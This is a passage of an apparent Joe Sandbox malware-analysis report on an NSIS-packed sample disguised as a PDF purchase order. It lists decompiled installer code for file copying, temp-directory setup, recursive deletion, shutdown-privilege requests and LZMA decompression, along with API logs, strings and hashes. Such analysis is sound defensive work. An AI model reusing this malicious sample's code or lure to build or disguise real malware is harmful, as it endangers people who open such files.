														if(__eflags == 0) {
															E00406668(L"C:\\Users\\Alvin\\AppData\\Local\\Temp", _t220);
														}
														E00406668(0x42b000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x42b800 = _t144;
														do {
															E004066A5(0, 0x420f08, _t235, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
															DeleteFileW(0x420f08);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(L"C:\\Users\\Alvin\\Desktop\\PO-230821_pdf.exe", 0x420f08, 1);
																__eflags = _t149;
																if(_t149 != 0) {
																	E00406428(_t202, 0x420f08, 0);
																	E004066A5(0, 0x420f08, _t235, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
																	_t153 = E00405C4B(0x420f08);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t202, _t235, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E0040603F(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E00406668(L"C:\\Users\\Alvin\\AppData\\Local\\Temp", _t222);
												E00406668(L"C:\\Users\\Alvin\\AppData\\Local\\Temp", _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= L"\"C:\\Users\\Alvin\\Desktop\\PO-230821_pdf.exe\"") {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t235, 0x3fb);
										lstrcatW(_t235, L"\\Temp");
										_t171 = E0040360F(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t235);
										lstrcatW(_t235, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t235);
										SetEnvironmentVariableW(L"TMP", _t235);
										_t176 = E0040360F(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x42a300 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}

0x0040364e
0x0040364f
0x00403656
0x00403659
0x00403660
0x00403663
0x00403676
0x0040367c
0x0040367f
0x00403682
0x00403690
0x00403698
0x004036a3
0x004036bc
0x004036be
0x004036c6
0x004036c6
0x004036d1
0x004036d3
0x004036d3
0x004036e8
0x0040370d
0x0040371b
0x0040371e
0x00403725
0x0040372c
0x0040372c
0x00403725
0x0040372e
0x00403733
0x00403734
0x00403740
0x00403744
0x0040374b
0x00403759
0x0040375e
0x00403765
0x00403769
0x0040376d
0x0040376f
0x0040376f
0x0040376d
0x00403776
0x0040377d
0x00403783
0x0040379b
0x004037ab
0x004037b0
0x004037b6
0x004037bd
0x004037c4
0x004037c6
0x004037c7
0x004037d1
0x004037d8
0x004037da
0x004037dc
0x004037dc
0x004037ef
0x004037f1
0x004038eb
0x004038eb
0x004038ee
0x004038f1
0x00000000
0x00000000
0x004037fb
0x004037fc
0x004037ff
0x00403808
0x00403808
0x0040380b
0x0040380e
0x00403811
0x00403814
0x00403814
0x00403814
0x00403815
0x00403819
0x004038d9
0x004038e2
0x004038e4
0x004038e7
0x004038ea
0x004038ea
0x004038ea
0x00000000
0x0040381f
0x00403820
0x00403821
0x00403825
0x0040383f
0x00403846
0x00403859
0x0040385a
0x0040386f
0x00403874
0x00403876
0x00403878
0x00403894
0x0040389b
0x004038ae
0x004038af
0x004038c4
0x004038ca
0x004038cc
0x004038ce
0x004038d6
0x004038d8
0x00000000
0x004038d8
0x004038d2
0x004038d4
0x004038f9
0x004038fd
0x00403906
0x0040390b
0x00403911
0x0040391c
0x0040391e
0x00403923
0x00403925
0x0040397d
0x00403982
0x0040398b
0x00403992
0x00403995
0x00403b6c
0x00403b6c
0x00403b71
0x00403b7a
0x00403b97
0x00403c0f
0x00403c0f
0x00403c17
0x00403c19
0x00403c19
0x00403c1f
0x00403c1f
0x00403bae
0x00403bba
0x00403bcb
0x00403bd2
0x00403bd9
0x00403bd9
0x00403be1
0x00403bed
0x00403bfb
0x00403c06
0x00000000
0x00000000
0x00000000
0x00403bef
0x00403bef
0x00403bf0
0x00403bf2
0x00403bf3
0x00403bf4
0x00403bf9
0x00403c08
0x00403c0a
0x00000000
0x00403c0a
0x00000000
0x00403bf9
0x00403bed
0x00403b84
0x00403b8b
0x00403b8b
0x004039a1
0x00403a48
0x00403a48
0x00403a54
0x00000000
0x00403a54
0x004039b2
0x004039ba
0x00403a0c
0x00403a0c
0x00403a12
0x00403a19
0x00403a67
0x00403a69
0x00403a6e
0x00403a70
0x00403a78
0x00403a78
0x00403a83
0x00403a88
0x00403a8f
0x00403a95
0x00403a97
0x00403b6a
0x00403b6a
0x00403b6a
0x00000000
0x00403a9d
0x00403a9d
0x00403a9f
0x00403aa0
0x00403aa9
0x00403aa2
0x00403aa2
0x00403aa2
0x00403aaf
0x00403ab7
0x00403abe
0x00403ac6
0x00403ac6
0x00403ad3
0x00403adf
0x00403ae9
0x00403ae9
0x00403aeb
0x00403af2
0x00403afc
0x00403b08
0x00403b0e
0x00403b14
0x00403b17
0x00403b21
0x00403b27
0x00403b29
0x00403b2d
0x00403b3e
0x00403b44
0x00403b49
0x00403b4b
0x00403b4e
0x00403b54
0x00403b54
0x00403b4b
0x00403b29
0x00403b57
0x00403b5e
0x00403b5e
0x00403b5e
0x00403b5e
0x00403b65
0x00000000
0x00403b65
0x00403a97
0x00403a1b
0x00403a1e
0x00403a22
0x00403a27
0x00403a29
0x00000000
0x00000000
0x00403a35
0x00403a40
0x00403a45
0x00000000
0x00403a45
0x004039c3
0x004039db
0x004039ec
0x004039ed
0x004039f1
0x004039f3
0x00403a01
0x00403a08
0x00000000
0x00000000
0x00000000
0x00403a08
0x00403a0a
0x00000000
0x00403a0a
0x0040392d
0x00403939
0x0040393e
0x00403943
0x00403945
0x00000000
0x00000000
0x0040394d
0x00403955
0x00403966
0x0040396e
0x00403970
0x00403975
0x00403977
0x00000000
0x00000000
0x00000000
0x00403977
0x00000000
0x004038d4
0x0040387d
0x0040387f
0x00000000
0x00000000
0x00403881
0x00403885
0x00403889
0x00403890
0x00403890
0x00403890
0x00403890
0x00000000
0x00403890
0x0040388b
0x0040388e
0x00000000
0x00000000
0x00000000
0x0040388e
0x00403827
0x0040382b
0x0040382e
0x00403835
0x00403835
0x00000000
0x00403835
0x00403830
0x00403833
0x00000000
0x00000000
0x00000000
0x00403833
0x00000000
0x00000000
0x00000000
0x00403801
0x00403801
0x00403802
0x00403803
0x00403803
0x00000000
0x00403801
0x00000000

APIs

SetErrorMode.KERNEL32(00008001), ref: 00403663
GetVersionExW.KERNEL32(?), ref: 0040368C
GetVersionExW.KERNEL32(0000011C), ref: 004036A3
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
OleInitialize.OLE32(00000000), ref: 0040377D
SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
CharNextW.USER32(00000000,"C:\Users\user\Desktop\PO-230821_pdf.exe",00000020,"C:\Users\user\Desktop\PO-230821_pdf.exe",00000000), ref: 004037E9
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
DeleteFileW.KERNEL32(1033), ref: 00403982
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78

Part of subcall function 00405C16: CreateDirectoryW.KERNEL32(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PO-230821_pdf.exe",00000000,?), ref: 00403A8F
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
CopyFileW.KERNEL32(C:\Users\user\Desktop\PO-230821_pdf.exe,00420F08,00000001), ref: 00403B21
CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
OleUninitialize.OLE32(?), ref: 00403B71
ExitProcess.KERNEL32 ref: 00403B8B
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
ExitProcess.KERNEL32 ref: 00403C1F

Strings

.tmp, xrefs: 00403A7D
"C:\Users\user\Desktop\PO-230821_pdf.exe", xrefs: 004037B6, 004037BC, 004037D1, 004039A8, 004039B4, 00403A02, 00403A0C
C:\Users\user\AppData\Local\Temp\, xrefs: 00403911, 00403916, 0040392C, 00403938, 00403947, 00403954, 00403960, 00403968, 00403A66, 00403A77, 00403A82, 00403A8E, 00403A9F, 00403AAE, 00403B64
C:\Users\user\Desktop\PO-230821_pdf.exe, xrefs: 00403B1C
TEMP, xrefs: 00403961
Low, xrefs: 0040394F
C:\Users\user\AppData\Local\Temp, xrefs: 00403A3B
\Temp, xrefs: 00403933
C:\Users\user\Desktop, xrefs: 00403A88, 00403A8D, 00403AC0
C:\Users\user\AppData\Local\Temp, xrefs: 00403901, 00403A30, 00403AB7, 00403AC1
~nsu, xrefs: 00403A61
NSIS Error, xrefs: 004037A1
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403659
UXTHEME, xrefs: 0040372E, 00403733, 00403739
Error launching installer, xrefs: 00403A12
1033, xrefs: 0040397D
SeShutdownPrivilege, xrefs: 00403BB4
TMP, xrefs: 00403969

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: "C:\Users\user\Desktop\PO-230821_pdf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PO-230821_pdf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3859024572-863579335
Opcode ID: f3ac1498e1d688579d7258b622a0b5d50c25907720076392c60a7523a2d29bb1
Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
Opcode Fuzzy Hash: f3ac1498e1d688579d7258b622a0b5d50c25907720076392c60a7523a2d29bb1
Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2e8 =  *0x42a2e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2e8 =  *0x42a2e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x42a2e8 =  *0x42a2e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405d7e
0x00405d83
0x00405d8c
0x00405d8f
0x00405d97
0x00405d9a
0x00405d9d
0x00405da5
0x00405da7
0x00405da8
0x00000000
0x00405da8
0x00405db3
0x00405db6
0x00405db6
0x00405db6
0x00405dba
0x00405dcd
0x00405dd4
0x00405dd9
0x00405ddd
0x00405ded
0x00405ddf
0x00405de5
0x00405de5
0x00405df2
0x00405df6
0x00405e02
0x00405e08
0x00405e0d
0x00405e13
0x00405e1e
0x00405e24
0x00405e26
0x00405e29
0x00405ed3
0x00405ed3
0x00405ed7
0x00405ed9
0x00405ed9
0x00405ed9
0x00405ed9
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e2f
0x00405e2f
0x00405e2f
0x00405e37
0x00405e57
0x00405e5f
0x00405e64
0x00405e6b
0x00405e86
0x00405e8b
0x00405e8d
0x00405eb1
0x00405e8f
0x00405e8f
0x00405e92
0x00405ea6
0x00405e94
0x00405e97
0x00405e9f
0x00405e9f
0x00405e92
0x00405e6d
0x00405e73
0x00405e75
0x00405e7b
0x00405e7b
0x00405e75
0x00000000
0x00405e6b
0x00405e39
0x00405e41
0x00000000
0x00000000
0x00405e43
0x00405e4b
0x00000000
0x00000000
0x00405e4d
0x00405e55
0x00000000
0x00000000
0x00000000
0x00405eb6
0x00405ebe
0x00405ec4
0x00405ec4
0x00405ecd
0x00000000
0x00405ecd
0x00405df8
0x00405e00
0x00000000
0x00000000
0x00000000
0x00405dbc
0x00405dbc
0x00405dbe
0x00405ede
0x00405ee0
0x00405ee3
0x00405f34
0x00405f34
0x00405f34
0x00405ee5
0x00405ee8
0x00405ef3
0x00405ef8
0x00405efa
0x00000000
0x00000000
0x00405efd
0x00405f09
0x00405f0e
0x00405f10
0x00000000
0x00405f2b
0x00405f12
0x00405f15
0x00000000
0x00000000
0x00405f1a
0x00000000
0x00405f21
0x00405eea
0x00405eea
0x00000000
0x00405eea
0x00405dc4
0x00405dc7
0x00000000
0x00000000
0x00000000
0x00405dc7

APIs

DeleteFileW.KERNEL32(?,?,75543420,75542EE0,00000000), ref: 00405D9D
lstrcatW.KERNEL32(00425750,\*.*), ref: 00405DE5
lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,75543420,75542EE0,00000000), ref: 00405E0E
FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,75543420,75542EE0,00000000), ref: 00405E1E
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
FindClose.KERNEL32(00000000), ref: 00405ECD

Strings

., xrefs: 00405E2F
\*.*, xrefs: 00405DDF
PWB, xrefs: 00405DCD
., xrefs: 00405E43

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$PWB$\*.*
API String ID: 2035342205-2468439962
Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE

Uniqueness

Uniqueness Score: -1.00%

Function 024508B7 Relevance: 6.4, APIs: 4, Instructions: 399
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2450000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: AllocNumaVirtual
String ID:
API String ID: 4233825816-0
Opcode ID: f4afd0009b576e156a24c9f8a0522b2fae668d4204696161f45768a69f5dce70
Instruction ID: 585a991a83e78f2856de8408055ef5ac415fa7ed9e9cc6372736eeea591e8e82
Opcode Fuzzy Hash: f4afd0009b576e156a24c9f8a0522b2fae668d4204696161f45768a69f5dce70
Instruction Fuzzy Hash: 2A026624D5D2ECADDF12CBE994547FDBFB05F2A201F0841CAE4E0B5283D136974A9B25

Uniqueness

Uniqueness Score: -1.00%

Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
